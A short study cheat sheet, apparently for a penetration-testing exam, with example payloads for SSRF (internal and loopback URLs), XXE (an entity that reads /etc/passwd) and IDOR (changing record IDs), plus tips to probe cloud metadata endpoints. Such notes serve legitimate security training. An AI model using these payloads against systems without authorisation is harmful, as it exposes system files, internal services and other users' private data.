Web Attacks
Overview
SSRF, XXE, IDOR and other web attacks.
Cheatsheet
SSRF
http://localhost:80 # Target local service
http://127.0.0.1 # Target loopback IP
http://0.0.0.0 # Target all interfaces
XXE
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<data>&xxe;</data> # Basic XXE payload to read /etc/passwd
IDOR
/api/user/1 -> /api/user/2 # Change ID to access other user data
/download?file=123 -> 124 # Change file ID to download other files
Command Examples
Common Pitfalls
- Not checking internal ports when testing SSRF
- XML parser has external entity processing disabled, so XXE payloads fail
Exam Survival Tips
- Try cloud metadata endpoints
- Check all ID parameters